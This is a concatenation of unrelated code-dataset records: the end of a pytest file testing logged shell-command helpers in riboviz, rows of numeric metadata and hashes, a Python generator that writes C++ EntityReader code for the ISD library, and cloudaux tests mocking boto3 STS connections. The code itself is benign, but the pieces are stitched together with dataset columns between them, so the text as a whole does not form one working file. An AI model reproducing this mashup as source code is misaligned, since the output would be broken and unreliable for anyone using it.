try:
process_utils.run_logged_command(cmd,
tmp_stdout_file,
tmp_cmd_file,
cmd_to_log=cmd_to_log)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
assert lines[1] == path # Output from ls
assert lines[2] == path # Output from ls
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
assert actual_cmds[0].rstrip('\n') == utils.list_to_str(cmd_to_log)
def test_run_logged_command_cmd_file_dry_run(tmp_stdout_file, tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_command` using a
single file to capture both standard output and standard error and
a file to capture commands sent to the operating system, with
the ``dry_run`` parameter set to ``True``.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
process_utils.run_logged_command(cmd, tmp_stdout_file,
tmp_cmd_file, True)
with open(tmp_stdout_file) as f:
lines = f.readlines()
assert len(lines) == 0
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
assert actual_cmds[0].rstrip('\n') == utils.list_to_str(cmd)
def test_run_logged_redirect_command(tmp_stderr_file, tmp_redirect_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_redirect_command`
using a file to capture standard error.
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt", path]
try:
process_utils.run_logged_redirect_command(cmd, tmp_redirect_file, tmp_stderr_file)
except AssertionError:
pass
# Compare path to captured redirect.
with open(path) as expected, open(tmp_redirect_file) as actual:
for line1, line2 in zip(expected, actual):
assert line1 == line2
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"cat: no-such-file.txt: No such file or directory"
def test_run_logged_redirect_command_cmd_file(
tmp_stderr_file, tmp_redirect_file, tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_redirect_command`
using a file to capture standard error and a file to capture
commands sent to the operating system.
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt", path]
try:
process_utils.run_logged_redirect_command(cmd,
tmp_redirect_file,
tmp_stderr_file,
tmp_cmd_file)
except AssertionError:
pass
# Compare path to captured redirect.
with open(path) as expected, open(tmp_redirect_file) as actual:
for line1, line2 in zip(expected, actual):
assert line1 == line2
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"cat: no-such-file.txt: No such file or directory"
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
expected_cmd = "%s > %s" % (utils.list_to_str(cmd), tmp_redirect_file)
assert actual_cmds[0].rstrip('\n') == expected_cmd
def test_run_logged_redirect_command_cmd_file_dry_run(
tmp_stderr_file, tmp_redirect_file, tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_redirect_command`
using a file to capture standard error and a file to capture
commands sent to the operating system, with the ``dry_run``
parameter set to ``True``.
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt", path]
process_utils.run_logged_redirect_command(cmd,
tmp_redirect_file,
tmp_stderr_file,
tmp_cmd_file,
True)
with open(tmp_redirect_file) as f:
lines = f.readlines()
assert len(lines) == 0
with open(tmp_stderr_file) as f:
lines = f.readlines()
assert len(lines) == 0
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
expected_cmd = "%s > %s" % (utils.list_to_str(cmd), tmp_redirect_file)
assert actual_cmds[0].rstrip('\n') == expected_cmd
def test_run_logged_pipe_command_log(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_pipe_command`
using a single file to capture both standard output and standard
error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
try:
process_utils.run_logged_pipe_command(cmd1, cmd2, tmp_stdout_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 2
assert lines[0] == "cat: no-such-file: No such file or directory"
assert str(num_lines * 2) == lines[1] # Output from wc
def test_run_logged_pipe_command_log_cmd_file(tmp_stdout_file,
tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_pipe_command`
using a single file to capture both standard output and standard
error and a file to capture commands sent to the operating
system.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
try:
process_utils.run_logged_pipe_command(cmd1,
cmd2,
tmp_stdout_file,
tmp_cmd_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 2
assert lines[0] == "cat: no-such-file: No such file or directory"
assert str(num_lines * 2) == lines[1] # Output from wc
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
expected_cmd = "%s | %s" % (utils.list_to_str(cmd1),
utils.list_to_str(cmd2))
assert actual_cmds[0].rstrip('\n') == expected_cmd
def test_run_logged_pipe_command_log_cmd_file_dry_run(tmp_stdout_file,
tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_pipe_command`
using a single file to capture both standard output and standard
error and a file to capture commands sent to the operating
system, with the ``dry_run`` parameter set to ``True``.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
process_utils.run_logged_pipe_command(cmd1,
cmd2,
tmp_stdout_file,
tmp_cmd_file,
True)
with open(tmp_stdout_file) as f:
lines = f.readlines()
assert len(lines) == 0
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
expected_cmd = "%s | %s" % (utils.list_to_str(cmd1),
utils.list_to_str(cmd2))
assert actual_cmds[0].rstrip('\n') == expected_cmd
def test_run_logged_pipe_command_error(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_pipe_command`
using a single file to capture both standard output and standard
error, where the first command in the pipeline includes an error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l", "-x"]
try:
process_utils.run_logged_pipe_command(cmd1, cmd2, tmp_stdout_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == "cat: no-such-file: No such file or directory"
assert lines[1] == "wc: invalid option -- 'x'"
assert lines[2] == "Try 'wc --help' for more information."
| 37.326676
| 90
| 0.641367
| 3,730
| 26,166
| 4.259517
| 0.03807
| 0.048716
| 0.069549
| 0.036254
| 0.965697
| 0.954368
| 0.942913
| 0.924471
| 0.913142
| 0.911631
| 0
| 0.008133
| 0.252847
| 26,166
| 700
| 91
| 37.38
| 0.804552
| 0.287205
| 0
| 0.819753
| 0
| 0
| 0.116225
| 0
| 0
| 0
| 0
| 0
| 0.264198
| 1
| 0.069136
| false
| 0.051852
| 0.012346
| 0
| 0.081481
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
00406ebe1a4d839db58b9ab9e1ec2ee191be1cf5
| 16,983
|
py
|
Python
|
CodeGenerator/Generators/ISD_EntityReader.py
|
Cooolrik/ISD
|
c06afd5a2f4e7d2fe21ba3c77e60595c1bd24ade
|
[
"MIT"
] | null | null | null |
CodeGenerator/Generators/ISD_EntityReader.py
|
Cooolrik/ISD
|
c06afd5a2f4e7d2fe21ba3c77e60595c1bd24ade
|
[
"MIT"
] | null | null | null |
CodeGenerator/Generators/ISD_EntityReader.py
|
Cooolrik/ISD
|
c06afd5a2f4e7d2fe21ba3c77e60595c1bd24ade
|
[
"MIT"
] | null | null | null |
# ISD Copyright (c) 2021 Ulrik Lindahl
# Licensed under the MIT license https://github.com/Cooolrik/ISD/blob/main/LICENSE
import CodeGeneratorHelpers as hlp
def ISD_EntityReader_h():
lines = []
lines.append('// ISD Copyright (c) 2021 Ulrik Lindahl')
lines.append('// Licensed under the MIT license https://github.com/Cooolrik/ISD/blob/main/LICENSE')
lines.append('')
lines.append('#pragma once')
lines.append('')
lines.append('#include "ISD_Types.h"')
lines.append('')
lines.append('namespace ISD')
lines.append(' {')
lines.append(' class MemoryReadStream;')
lines.append('')
lines.append(' class EntityReader')
lines.append(' {')
lines.append(' private:')
lines.append(' MemoryReadStream &sstream;')
lines.append(' const u64 end_position;')
lines.append('')
lines.append(' std::unique_ptr<EntityReader> active_subsection;')
lines.append(' size_t active_subsection_array_size = 0;')
lines.append(' size_t active_subsection_index = ~0;')
lines.append(' u64 active_subsection_end_pos = 0;')
lines.append('')
lines.append(' public:')
lines.append(' EntityReader( MemoryReadStream &_sstream );')
lines.append(' EntityReader( MemoryReadStream &_sstream , const u64 _end_position );')
lines.append('')
lines.append(' // Read a section. ')
lines.append(' // If the section is null, the section is directly closed, nullptr+success is returned ')
lines.append(' // from BeginReadSection, and EndReadSection shall not be called.')
lines.append(' std::tuple<EntityReader *, bool> BeginReadSection( const char *key, const u8 key_length, const bool null_object_is_allowed );')
lines.append(' bool EndReadSection( const EntityReader *section_reader );')
lines.append('')
lines.append(' // Build a sections array. ')
lines.append(' // If the section is null, the section array is directly closed, nullptr+0+success is returned ')
lines.append(' // from BeginReadSectionsArray, and EndReadSectionsArray shall not be called.')
lines.append(' std::tuple<EntityReader *, size_t, bool> BeginReadSectionsArray( const char *key, const u8 key_length, const bool null_object_is_allowed, std::vector<i32> *dest_index = nullptr );')
lines.append(' bool BeginReadSectionInArray( const EntityReader *sections_array_reader , const size_t section_index, bool *dest_section_has_data = nullptr /* if nullptr, object is not allowed to be empty*/ );')
lines.append(' bool EndReadSectionInArray( const EntityReader *sections_array_reader , const size_t section_index );')
lines.append(' bool EndReadSectionsArray( const EntityReader *sections_array_reader );')
lines.append('')
lines.append(' // The Read function template, specifically implemented below for all supported value types.')
lines.append(' template <class T> bool Read( const char *key, const u8 key_length, T &value );')
lines.append('')
# print the base types
for basetype in hlp.base_types:
type_name = 'VT_' + basetype.name
lines.append(' // ' + type_name )
for type_impl in basetype.variants:
type_impl_name = type_impl.implementing_type
lines.append(' template <> bool Read<' + type_impl_name + '>( const char *key, const u8 key_length, ' + type_impl_name + ' &value );')
lines.append(' template <> bool Read<optional_value<' + type_impl_name + '>>( const char *key, const u8 key_length, optional_value<' + type_impl_name + '> &value );')
lines.append('')
# print the array types
for basetype in hlp.base_types:
type_name = 'VT_Array_' + basetype.name
lines.append(' // ' + type_name )
for type_impl in basetype.variants:
type_impl_name = type_impl.implementing_type
lines.append(' template <> bool Read<std::vector<' + type_impl_name + '>>( const char *key, const u8 key_length, std::vector<' + type_impl_name + '> &value );')
lines.append(' template <> bool Read<optional_vector<' + type_impl_name + '>>( const char *key, const u8 key_length, optional_vector<' + type_impl_name + '> &value );')
lines.append(' template <> bool Read<idx_vector<' + type_impl_name + '>>( const char *key, const u8 key_length, idx_vector<' + type_impl_name + '> &value );')
lines.append(' template <> bool Read<optional_idx_vector<' + type_impl_name + '>>( const char *key, const u8 key_length, optional_idx_vector<' + type_impl_name + '> &value );')
lines.append('')
lines.append(' };')
lines.append('')
lines.append(' // Read method. Specialized for all supported value types.')
lines.append(' template <class T> bool EntityReader::Read( const char *key, const u8 key_length, T &value )')
lines.append(' {')
lines.append(' static_assert(false, "Error: EntityReader::Read template: The value type T cannot be serialized.");')
lines.append(' }')
lines.append(' };')
hlp.write_lines_to_file("../ISD/ISD_EntityReader.h",lines)
def ISD_EntityReader_cpp():
lines = []
lines.append('// ISD Copyright (c) 2021 Ulrik Lindahl')
lines.append('// Licensed under the MIT license https://github.com/Cooolrik/ISD/blob/main/LICENSE')
lines.append('')
lines.append('#pragma once')
lines.append('')
lines.append('#include "ISD_EntityReader.h"')
lines.append('#include "ISD_MemoryReadStream.h"')
lines.append('')
lines.append('#include "ISD_EntityReaderTemplates.inl"')
lines.append('')
lines.append('namespace ISD')
lines.append(' {')
lines.append(' EntityReader::EntityReader( MemoryReadStream &_sstream ) : sstream( _sstream ) , end_position( _sstream.GetSize() )')
lines.append(' {')
lines.append(' }')
lines.append('')
lines.append(' EntityReader::EntityReader( MemoryReadStream &_sstream , const u64 _end_position ) : sstream( _sstream ) , end_position( _end_position )')
lines.append(' {')
lines.append(' }')
lines.append('')
# print the base types
for basetype in hlp.base_types:
type_name = 'VT_' + basetype.name
array_type_name = 'VT_Array_' + basetype.name
for type_impl in basetype.variants:
implementing_type = str(type_impl.implementing_type)
item_type = str(type_impl.item_type)
num_items_per_object = str(type_impl.num_items_per_object)
if type_impl.overrides_type:
lines.append(f' // {implementing_type}: using {item_type} to read')
lines.append(f' template <> bool EntityReader::Read<{implementing_type}>( const char *key, const u8 key_length, {implementing_type} &dest_variable )')
lines.append(f' {{')
lines.append(f' {item_type} tmp_variable;')
lines.append(f' if( !this->Read<{item_type}>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' dest_variable = {implementing_type}( tmp_variable );')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: using optional_value<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<optional_value<{implementing_type}>>( const char *key, const u8 key_length, optional_value<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' optional_value<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<optional_value<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' if( tmp_variable.has_value() )')
lines.append(f' dest_variable.set( tmp_variable.value() );')
lines.append(f' else')
lines.append(f' dest_variable.reset();')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: using std::vector<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<std::vector<{implementing_type}>>( const char *key, const u8 key_length, std::vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' std::vector<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<std::vector<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' // copy values. use explicit ctor and emplace, since some objects have private conversion ctors')
lines.append(f' dest_variable.reserve( tmp_variable.size() );')
lines.append(f' for( size_t i = 0; i < tmp_variable.size(); ++i )')
lines.append(f' dest_variable.emplace_back( {implementing_type}(tmp_variable[i]) );')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: optional_vector<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<optional_vector<{implementing_type}>>( const char *key, const u8 key_length, optional_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' optional_vector<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<optional_vector<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' if( tmp_variable.has_value() )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f'')
lines.append(f' // copy values. use explicit ctor and emplace, since some objects have private conversion ctors')
lines.append(f' dest_variable.values().reserve( tmp_variable.values().size() );')
lines.append(f' for( size_t i = 0; i < tmp_variable.values().size(); ++i )')
lines.append(f' dest_variable.values().emplace_back( {implementing_type}(tmp_variable.values()[i]) );')
lines.append(f' }}')
lines.append(f' else')
lines.append(f' {{')
lines.append(f' dest_variable.reset();')
lines.append(f' }}')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: using idx_vector<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<idx_vector<{implementing_type}>>( const char *key, const u8 key_length, idx_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' idx_vector<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<idx_vector<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' // move index, as no conversion is needed')
lines.append(f' dest_variable.index() = std::move( tmp_variable.index() );')
lines.append(f'')
lines.append(f' // copy values. use explicit ctor and emplace, since some objects have private conversion ctors')
lines.append(f' dest_variable.values().reserve( tmp_variable.values().size() );')
lines.append(f' for( size_t i = 0; i < tmp_variable.values().size(); ++i )')
lines.append(f' dest_variable.values().emplace_back( {implementing_type}(tmp_variable.values()[i]) );')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: optional_idx_vector<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<optional_idx_vector<{implementing_type}>>( const char *key, const u8 key_length, optional_idx_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' optional_idx_vector<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<optional_idx_vector<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' if( tmp_variable.has_value() )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f'')
lines.append(f' // move index, as no conversion is needed')
lines.append(f' dest_variable.index() = std::move( tmp_variable.index() );')
lines.append(f'')
lines.append(f' // copy values. use explicit ctor and emplace, since some objects have private conversion ctors')
lines.append(f' dest_variable.values().reserve( tmp_variable.values().size() );')
lines.append(f' for( size_t i = 0; i < tmp_variable.values().size(); ++i )')
lines.append(f' dest_variable.values().emplace_back( {implementing_type}(tmp_variable.values()[i]) );')
lines.append(f' }}')
lines.append(f' else')
lines.append(f' {{')
lines.append(f' dest_variable.reset();')
lines.append(f' }}')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
else:
lines.append(f' // {type_name}: {implementing_type}')
lines.append(f' template <> bool EntityReader::Read<{implementing_type}>( const char *key, const u8 key_length, {implementing_type} &dest_variable )')
lines.append(f' {{')
lines.append(f' reader_status status = read_single_item<ValueType::{type_name},{implementing_type}>(this->sstream, key, key_length, false, &(dest_variable) );')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: optional_value<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<optional_value<{implementing_type}>>( const char *key, const u8 key_length, optional_value<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f' reader_status status = read_single_item<ValueType::{type_name},{implementing_type}>(this->sstream, key, key_length, true, &(dest_variable.value()) );')
lines.append(f' if( status == reader_status::success_empty )')
lines.append(f' dest_variable.reset();')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: std::vector<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<std::vector<{implementing_type}>>( const char *key, const u8 key_length, std::vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' reader_status status = read_array<ValueType::{array_type_name},{implementing_type}>(this->sstream, key, key_length, false, &(dest_variable), nullptr );')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: optional_vector<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<optional_vector<{implementing_type}>>( const char *key, const u8 key_length, optional_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f' reader_status status = read_array<ValueType::{array_type_name},{implementing_type}>(this->sstream, key, key_length, true, &(dest_variable.values()), nullptr );')
lines.append(f' if( status == reader_status::success_empty )')
lines.append(f' dest_variable.reset();')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: idx_vector<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<idx_vector<{implementing_type}>>( const char *key, const u8 key_length, idx_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' reader_status status = read_array<ValueType::{array_type_name},{implementing_type}>(this->sstream, key, key_length, false, &(dest_variable.values()), &(dest_variable.index()) );')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: optional_idx_vector<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<optional_idx_vector<{implementing_type}>>( const char *key, const u8 key_length, optional_idx_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f' reader_status status = read_array<ValueType::{array_type_name},{implementing_type}>(this->sstream, key, key_length, true, &(dest_variable.values()), &(dest_variable.index()) );')
lines.append(f' if( status == reader_status::success_empty )')
lines.append(f' dest_variable.reset();')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(' };')
hlp.write_lines_to_file("../ISD/ISD_EntityReader.cpp",lines)
def run():
ISD_EntityReader_h()
ISD_EntityReader_cpp()
| 56.989933
| 222
| 0.676206
| 2,202
| 16,983
| 5.027702
| 0.075386
| 0.242435
| 0.175594
| 0.090597
| 0.877428
| 0.85593
| 0.822419
| 0.809773
| 0.783308
| 0.76172
| 0
| 0.003657
| 0.162692
| 16,983
| 298
| 223
| 56.989933
| 0.774895
| 0.010658
| 0
| 0.664207
| 0
| 0.103321
| 0.625409
| 0.225219
| 0
| 0
| 0
| 0
| 0.00369
| 1
| 0.01107
| false
| 0
| 0.00369
| 0
| 0.01476
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cc64ba8c9040168b08cf2f0761703ce7069fb218
| 208
|
py
|
Python
|
interrogatio/handlers/__init__.py
|
ffaraone/interrogatio
|
8b66e7fe73d14bfda38cc2eb3aecb3291e4afda1
|
[
"BSD-3-Clause"
] | 5
|
2019-02-19T13:10:39.000Z
|
2022-03-04T19:11:04.000Z
|
interrogatio/handlers/__init__.py
|
ffaraone/interrogatio
|
8b66e7fe73d14bfda38cc2eb3aecb3291e4afda1
|
[
"BSD-3-Clause"
] | 11
|
2020-03-24T16:58:41.000Z
|
2021-12-14T10:19:17.000Z
|
interrogatio/handlers/__init__.py
|
ffaraone/interrogatio
|
8b66e7fe73d14bfda38cc2eb3aecb3291e4afda1
|
[
"BSD-3-Clause"
] | 2
|
2019-05-31T08:36:26.000Z
|
2020-12-18T17:58:50.000Z
|
from interrogatio.handlers.base import QHandler # noqa
from interrogatio.handlers.registry import ( # noqa
register, get_instance, get_registered,
)
from interrogatio.handlers.builtins import * # noqa
| 34.666667
| 55
| 0.788462
| 24
| 208
| 6.75
| 0.541667
| 0.296296
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139423
| 208
| 5
| 56
| 41.6
| 0.905028
| 0.067308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aeb64d63948bbd932197caf9211def73c9432e83
| 3,615
|
py
|
Python
|
cloudaux/tests/aws/test_sts.py
|
Deepak1100/cloudaux
|
322b26b9c47e5f4fcd5cd11fc4aa5fa830c050f9
|
[
"Apache-2.0"
] | 76
|
2017-02-20T21:35:29.000Z
|
2022-02-07T19:21:07.000Z
|
cloudaux/tests/aws/test_sts.py
|
Deepak1100/cloudaux
|
322b26b9c47e5f4fcd5cd11fc4aa5fa830c050f9
|
[
"Apache-2.0"
] | 100
|
2016-11-13T08:36:09.000Z
|
2021-08-11T05:59:18.000Z
|
cloudaux/tests/aws/test_sts.py
|
Deepak1100/cloudaux
|
322b26b9c47e5f4fcd5cd11fc4aa5fa830c050f9
|
[
"Apache-2.0"
] | 43
|
2016-11-13T16:50:40.000Z
|
2021-08-16T21:01:03.000Z
|
"""
.. module: cloudaux.tests.aws.test_sts
:platform: Unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Josafat Gonzalez <josafatg@netflix.com>
"""
from botocore.client import Config
from cloudaux.aws.sts import boto3_cached_conn
from mock import patch
def test_boto3_cached_conn_read_only():
# Arrange
conn_details = {
'account_number': '111111111111',
'assume_role': 'role_one',
'region': 'us-east-1',
'read_only': True
}
with patch('boto3.session.Session.client'):
# Act
conn = boto3_cached_conn('s3', **conn_details)
# Assert
assert 'PolicyArns' in conn.assume_role.call_args.kwargs
def test_boto3_cached_conn_default():
# Arrange
conn_details = {
'account_number': '111111111111',
'assume_role': 'role_one',
'region': 'us-east-1'
}
with patch('boto3.session.Session.client'):
# Act
conn = boto3_cached_conn('s3', **conn_details)
# Assert
assert 'PolicyArns' not in conn.assume_role.call_args.kwargs
def test_boto3_cached_conn_retry_config(sts):
from cloudaux.aws.sts import _client
import cloudaux.aws.sts
def mock_client(*args, **kwargs):
with patch('boto3.session.Session') as p:
_client(*args, **kwargs)
return p
# With the default:
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3')
assert conn.mock_calls[1].kwargs['config'].retries == {'max_attempts': 10}
cloudaux.aws.sts.CACHE = {}
# With STS role assumption:
conn_details = {
'account_number': '111111111111',
'assume_role': 'role_one',
'region': 'us-east-1'
}
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', **conn_details)
assert conn.mock_calls[1].kwargs['config'].retries == {'max_attempts': 10}
cloudaux.aws.sts.CACHE = {}
# With a specified retry Config:
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', retry_max_attempts=1000)
assert conn.mock_calls[1].kwargs['config'].retries == {'max_attempts': 1000}
cloudaux.aws.sts.CACHE = {}
# With STS role assumption:
conn_details['retry_max_attempts'] = 1000
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', **conn_details)
assert conn.mock_calls[1].kwargs['config'].retries == {'max_attempts': 1000}
cloudaux.aws.sts.CACHE = {}
def test_boto3_cached_conn_config(sts):
from cloudaux.aws.sts import _client
import cloudaux.aws.sts
def mock_client(*args, **kwargs):
with patch('boto3.session.Session') as p:
_client(*args, **kwargs)
return p
# With the default:
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', config=Config(signature_version='s3v4'))
assert conn.mock_calls[1].kwargs['config'].signature_version == 's3v4'
cloudaux.aws.sts.CACHE = {}
# With STS role assumption:
conn_details = {
'account_number': '111111111111',
'assume_role': 'role_one',
'region': 'us-east-1'
}
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', config=Config(signature_version='s3v4'), **conn_details)
assert conn.mock_calls[1].kwargs['config'].signature_version == 's3v4'
cloudaux.aws.sts.CACHE = {}
| 31.710526
| 95
| 0.6426
| 451
| 3,615
| 4.929047
| 0.179601
| 0.084121
| 0.107063
| 0.068376
| 0.853351
| 0.822762
| 0.822762
| 0.822762
| 0.822762
| 0.817814
| 0
| 0.040925
| 0.222683
| 3,615
| 113
| 96
| 31.99115
| 0.750178
| 0.114799
| 0
| 0.71831
| 0
| 0
| 0.202766
| 0.076077
| 0
| 0
| 0
| 0
| 0.112676
| 1
| 0.084507
| false
| 0
| 0.098592
| 0
| 0.211268
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aef63c24ef0d01a8655e8af8758804242bac0963
| 3,485
|
py
|
Python
|
papers/ICCV2021-NGC/configs/_updater.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 69
|
2021-11-01T11:18:13.000Z
|
